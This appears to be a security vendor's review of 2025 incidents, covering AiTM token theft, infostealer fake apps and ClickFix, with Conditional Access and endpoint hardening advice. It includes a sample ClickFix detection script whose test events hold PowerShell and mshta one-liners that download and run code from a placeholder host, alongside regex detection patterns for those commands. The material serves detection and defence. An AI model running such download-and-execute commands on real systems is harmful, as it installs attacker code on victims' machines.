2025 Breach Review: Lessons from the Chorus Cyber SOC

Introduction

An organisation is best placed to defend against cyber‑attacks when it understands how attackers actually break in. With that in mind, here’s a brief review of the major incidents that the Chorus Cyber Security Operations Center (CSOC) handled in 2025 – and, crucially, what every organisation can learn from them.

This analysis covers every real‑world incident that triggered incident response (IR) involvement within Chorus Cyber. That doesn’t always mean a monitored customer was fully compromised; it includes cases where data was exfiltrated, cases where exfiltration was possible but prevented, and cases where our response was faster than the attacker and a breach was averted. (We’ve omitted unannounced penetration tests to keep the findings relevant.)

Because the vast majority of our customers are ≤1,000 seats, these data points offer a unique window into the tactics that succeed against SMBs – and the practical controls that most effectively stop them.

Account Compromise

Phishing is still the primary risk for SMBs

This category was the largest by far – 68% of all breaches – and 95% of those were Adversary‑in‑the‑Middle (AiTM) attacks that steal session tokens, allowing accounts to be phished even when they are protected by certain types of MFA (e.g. SMS, email OTP and push notifications). AiTM kits are ubiquitous and inexpensive; open‑source tools like Modlishka, Evilginx and Muraena lower the technical barrier, making successful campaigns accessible to less‑skilled actors, and several AiTM kits are available for hire for around $75 USD per month, some of which even include customer service.

For customers in our CSOC, near real‑time detection and automated response typically limit the attacker’s window to 7-10 minutes (depending on log ingestion delay). That is still enough time for a motivated actor to attempt mailbox scraping or quick exfiltration – and social‑engineering lures remain persuasive.

The overlooked reality

What is often neglected is that there are several easy ways to make your organisation more resilient to this type of attack, and a shocking 60% of these successful AiTM attacks are low‑level, opportunistic, spray‑and‑pray attacks. It’s true that a motivated attacker can use a VPN to appear as though they are in the same country as the victim, and they can manipulate their user agent string to pretend that they are signing in from a Windows 11 device, but the reality of what we see is that attackers, well, don’t.

We still see a large proportion of low‑effort attacks: 60% either include sign‑ins from US‑based IP pools or feature unchanged/non‑spoofed user agent strings, or, in many cases, both. In practice, simple Conditional Access (CA) policies (blocking unsupported platforms plus geo‑blocks) would have prevented the majority of these opportunistic intrusions – with minimal disruption to users.

No single control is 100% effective. The objective is friction: raise the cost of compromise, so attackers move on to easier targets.

Mitigations that work (and why many teams skip them)

Phishing‑resistant MFA (passkeys/FIDO2): Rolling out passkeys materially raises the bar for token theft and relay attacks. Start with Microsoft Entra ID’s passkey method and Authenticator support.

Conditional Access (CA) constraints with low user impact:

  • Block unknown/unsupported device platforms to cut out opportunistic sign‑ins that present as Linux or non‑standard user agents (see Microsoft’s Conditional Access policy template).
  • Geo‑blocking for countries where you have no operations. This simple control eliminates large volumes of spray‑and‑pray attempts (see Microsoft’s guidance on blocking by location).
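Before switching the two policies above out of report-only mode, it helps to see what they would have blocked and whom they would affect. The following is an added example (not Chorus Cyber’s code, and not a Microsoft API) that dry-runs both policies over constructed sign-in records mirroring Entra sign-in log fields; the operating countries, supported platforms and sample records are assumptions. It also covers step 2 of the baseline further down.

```python
"""Dry run of the two low-impact Conditional Access policies above against sign-in records
(added example, not Chorus Cyber's code). Records mirror Microsoft Entra sign-in log fields
(userPrincipalName, location.countryOrRegion, deviceDetail.operatingSystem); samples are constructed."""
from collections import Counter

# Constructed policy inputs: countries the organisation operates in, and the device
# platforms it supports. Conditional Access infers the device platform from information
# such as the user agent string, which is why unspoofed Linux / script sign-ins fall out here.
OPERATING_COUNTRIES = {"GB", "IE"}
SUPPORTED_PLATFORMS = ("windows", "macos", "ios", "android")

SAMPLE_SIGNINS = [  # constructed; a real run would load the Entra sign-in log export
    {"userPrincipalName": "alice@example.invalid", "location": {"countryOrRegion": "GB"},
     "deviceDetail": {"operatingSystem": "Windows 11"}, "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"},
    {"userPrincipalName": "alice@example.invalid", "location": {"countryOrRegion": "US"},
     "deviceDetail": {"operatingSystem": "Linux"}, "userAgent": "python-requests/2.31"},
    {"userPrincipalName": "bob@example.invalid", "location": {"countryOrRegion": "GB"},
     "deviceDetail": {"operatingSystem": "Linux"}, "userAgent": "Mozilla/5.0 (X11; Linux x86_64)"},
    {"userPrincipalName": "carol@example.invalid", "location": {"countryOrRegion": "IE"},
     "deviceDetail": {"operatingSystem": "Ios 17"}, "userAgent": "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0)"},
]

def evaluate(signin):
    """Return the names of the policies that would block this sign-in (empty if it passes both)."""
    blocked_by = []
    country = signin.get("location", {}).get("countryOrRegion", "")
    if country not in OPERATING_COUNTRIES:          # geo-block: no operations there
        blocked_by.append("geo-block")
    os_name = signin.get("deviceDetail", {}).get("operatingSystem", "").lower()
    if not os_name.startswith(SUPPORTED_PLATFORMS):  # unknown or unsupported platform
        blocked_by.append("unsupported-platform")
    return blocked_by

def dry_run(signins):
    """Count how many sign-ins each policy would block and how many distinct users are affected,
    so the impact on real users can be checked before the policies leave report-only mode."""
    summary = Counter()
    affected_users = set()
    for s in signins:
        hits = evaluate(s)
        summary.update(hits)
        if hits:
            summary["total_blocked"] += 1
            affected_users.add(s["userPrincipalName"])
    summary["affected_users"] = len(affected_users)
    return dict(summary)
```

The second record is the kind of replayed session the page describes: the same user as the first, but from a US address on an unspoofed Linux client, so both policies fire on it.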

Malware

Roughly 30% of breaches fell into the malware category. Most were fake apps: “free” PDF editors, browsers or useful utilities with infostealer capabilities that quietly harvest credentials, tokens and browser data while providing basic functionality. Adversaries drive distribution via SEO poisoning and malvertising; we even saw malicious artifacts hosted on trusted platforms (e.g., impersonated Docker images).

Why Threat Hunting matters for SMBs

These fake apps are very good at evading AV and EDR tools, as they appear legitimate. Many customers would not have known they were affected without proactive Threat Hunting – one reason frameworks and regulations (e.g., NIS2) increasingly emphasise continuous detection through threat hunting.

ClickFix is the year’s standout technique

In H2 2025, ClickFix surged. It is an astonishingly simple attack: a fake CAPTCHA instructs the user to copy a malicious command into the Windows Run box, opened with the shortcut Windows + R. That command then directly installs malware, infostealers or Remote Access Trojans (RATs) onto the victim’s machine.

In Microsoft’s Digital Defense Report 2025, ClickFix was the most common initial access method that Microsoft Defender Experts observed in Defender Experts notifications over the last year, accounting for 47% of attacks. With open‑source ClickFix kits available on GitHub, we expect this trend to keep growing into 2026, although the good news is that detection is working well here, with the vast majority of ClickFix attempts blocked on sight.

Practical hardening

  • Disable the Run dialog (Win+R) and remove “Run” from Start for non‑admin users via Intune configuration profiles or Group Policy. This is low‑impact for most roles and directly targets ClickFix’s “single‑command” workflow.
  • Application allow‑listing and software provisioning to reduce the temptation to download risky “free tools”.
  • User education focused on malvertising/SEO lures and “copy‑this‑command” prompts.
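The hardening list above (and step 3 of the baseline below, “monitor PowerShell/Run execution patterns”) can be backed by a detection rule. This is an added example (not Chorus Cyber’s code): a pass over constructed process-creation events with Sysmon Event ID 1 / Windows 4688-style fields, keying on the explorer.exe parent that a Win+R launch produces and on hallmarks commonly reported in ClickFix commands. The hallmark regexes, sample events and example.invalid URLs are assumptions.

```python
"""Flag ClickFix-style command executions in process-creation telemetry (added example, not Chorus Cyber's code).
Events are constructed to resemble Sysmon Event ID 1 / Windows 4688 fields; a command pasted into
Win+R is spawned by explorer.exe, which is the parent relationship this rule keys on."""
import re

# Interpreters a pasted one-liner typically lands in.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}

# Hallmarks reported in ClickFix commands, as case-insensitive regexes (assumed patterns).
HALLMARKS = {
    "hidden-window": r"-w(?:indowstyle)?\s+hidden",
    "encoded-command": r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
    "download-and-run": r"(?:iwr|invoke-webrequest|curl|downloadstring)\b.*\|\s*(?:iex|invoke-expression)\b",
    "remote-hta": r"\bmshta(?:\.exe)?\s+https?://",
    "verification-text": r"#.*(?:not a robot|captcha|verification)",
}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def analyse(event):
    """Return the hallmark names matched if the event looks like a pasted ClickFix command, else []."""
    if basename(event.get("ParentImage", "")) != "explorer.exe":
        return []
    if basename(event.get("Image", "")) not in INTERPRETERS:
        return []
    cmd = event.get("CommandLine", "")
    return [name for name, pat in HALLMARKS.items() if re.search(pat, cmd, re.IGNORECASE)]

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
SAMPLE_EVENTS = [  # constructed
    # Benign: a user opened a PowerShell console from the Start menu.
    {"User": "CORP\\alice", "ParentImage": EXPLORER, "Image": PS, "CommandLine": f'"{PS}"'},
    # ClickFix-style paste: hidden window, download-and-run, fake verification comment.
    {"User": "CORP\\bob", "ParentImage": EXPLORER, "Image": PS,
     "CommandLine": 'powershell -w hidden -c "iwr https://example.invalid/v | iex" # I am not a robot'},
    # Remote-HTA variant.
    {"User": "CORP\\carol", "ParentImage": EXPLORER, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/verify.hta"},
    # Encoded command from a scheduled task: not explorer-parented, so out of scope for this rule.
    {"User": "NT AUTHORITY\\SYSTEM", "ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": "powershell -enc " + "Q" * 40},
]

def triage(events):
    """Return (user, hallmarks) for each event matching at least one hallmark."""
    return [(e["User"], hits) for e in events if (hits := analyse(e))]
```

Once Win+R is disabled for standard users, any explorer.exe-parented interpreter launch with these hallmarks is also a sign that the policy is not being applied to that device.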

Targeting

Charities and Not‑for‑Profits experienced the most breaches in our data. Budget constraints, a high proportion of BYOD volunteers, and high‑value personal data make these organisations attractive – and comparatively soft targets.

What to do now: a practical baseline

  1. Enable phishing‑resistant MFA (passkeys) and prioritise administrators and finance/HR staff. Start here: Enable passkeys with Entra ID
  2. If you haven’t already, enforce Conditional Access policies that:
    1. Block unknown/unsupported platforms (template)
    2. Block sign‑ins from non‑operating countries/regions (policy)
  3. Harden endpoints against ClickFix: disable Win+R for standard users; monitor clipboard and PowerShell/Run execution patterns; reinforce user training (see the Microsoft Security Blog post on ClickFix).
  4. Implement allow‑listing and trusted software catalogs; monitor for SEO/malvertising‑driven downloads.
  5. Invest in Threat Hunting (internal or managed) to surface infostealers and quiet persistence before data theft.
  6. Plan for BYOD realities: use app protection and device compliance for Microsoft 365 apps; apply exception‑light policies that still reduce token‑theft risk.

Conclusion

2025 reminded us that most successful compromises are simple: session‑token theft through AiTM, one‑line malware installs via ClickFix, and malvertising that convinces users to “just get the job done.” The strongest defences are similarly straightforward:

  • Strengthen MFA to phishing‑resistant types.
  • Apply geo + platform blocks that remove entire classes of opportunistic sign‑ins.
  • Remove easy execution paths (Win+R, unmanaged PowerShell) and reinforce user judgement.
  • Back it up with Threat Hunting, Managed Detection & Response (MDR/MXDR) and rapid IR, so missteps don’t become breaches.

None of these controls is perfect on its own – but together, they raise the cost of attack and shrink the attacker’s window to minutes, which is often the difference between “incident contained” and “breach disclosed.” The organisations that adopt this baseline now will enter 2026 with fewer alerts, faster recovery, and far less material risk. The lesson for all SMBs: controls must reflect real‑world attack paths.

Chorus Cyber 2025 Wrapped

Interested in our MDR & MXDR services?

We deliver high‑performing, Microsoft‑native MDR and MXDR services globally via a channel model, helping MSPs and IT providers easily deliver leading managed security services to their customers. You can find out more about our partner program and our managed security services on our website, or get in touch for more information.